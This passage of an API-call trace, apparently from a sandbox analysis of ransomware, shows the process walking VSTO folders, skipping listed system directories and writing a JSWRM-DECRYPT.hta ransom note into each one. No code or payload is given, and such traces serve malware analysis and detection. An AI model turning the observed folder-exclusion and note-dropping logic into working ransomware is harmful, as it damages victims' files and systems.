[0068.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0068.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.951] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a69a2a7, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xb3fd6e56, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a69a2a7, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0xf1000, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2=".") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="..") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="...") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="windows") returned -1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="recovery") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="perflogs") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="documents and settings") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="system volume information") returned 1 [0068.951] lstrcmpiW (lpString1="VGX.dll", lpString2="msocache") returned 1 [0068.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VGX.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VGX.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VGX.dll", lpUsedDefaultChar=0x0) returned 7 [0068.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VGX.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VGX.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VGX.dll", lpUsedDefaultChar=0x0) returned 7 [0068.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.951] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a69a2a7, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xb3fd6e56, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a69a2a7, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0xf1000, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="VGX.dll", cAlternateFileName="")) returned 0 [0068.951] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0068.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0068.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0068.951] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="VSTO", cAlternateFileName="")) returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2=".") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="..") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="...") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="windows") returned -1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="recovery") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="perflogs") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="documents and settings") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="$RECYCLE.BIN") returned 1 [0068.951] lstrcmpiW (lpString1="VSTO", lpString2="system volume information") returned 1 [0068.952] lstrcmpiW (lpString1="VSTO", lpString2="msocache") returned 1 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0068.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\jswrm-decrypt.hta")) returned 0xffffffff [0068.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.962] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.962] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.963] CloseHandle (hObject=0x298) returned 1 [0068.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0068.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0068.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0068.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0068.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\jswrm-decrypt.hta")) returned 0x20 [0068.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0068.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0068.964] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fc43456, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0068.964] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.964] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fc43456, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.964] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.964] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.964] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4aebd53e, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="10.0", cAlternateFileName="")) returned 1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="...") returned 1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="recovery") returned -1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="perflogs") returned -1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="documents and settings") returned -1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="$RECYCLE.BIN") returned 1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="system volume information") returned -1 [0068.964] lstrcmpiW (lpString1="10.0", lpString2="msocache") returned -1 [0068.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0068.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\jswrm-decrypt.hta")) returned 0xffffffff [0068.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.969] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.969] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.970] CloseHandle (hObject=0x454) returned 1 [0068.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\jswrm-decrypt.hta")) returned 0x20 [0068.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.970] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fc43456, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0068.970] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.970] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fc43456, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="..", cAlternateFileName="")) returned 1 [0068.970] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.970] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.970] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4a6fdac8, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="1033", cAlternateFileName="")) returned 1 [0068.970] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0068.970] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0068.970] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0068.971] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0068.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0068.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.975] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.975] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.979] CloseHandle (hObject=0x458) returned 1 [0068.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\jswrm-decrypt.hta")) returned 0x20 [0068.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.980] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fc696cb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName=".", cAlternateFileName="")) returned 0x232200 [0068.980] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.980] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fc696cb, 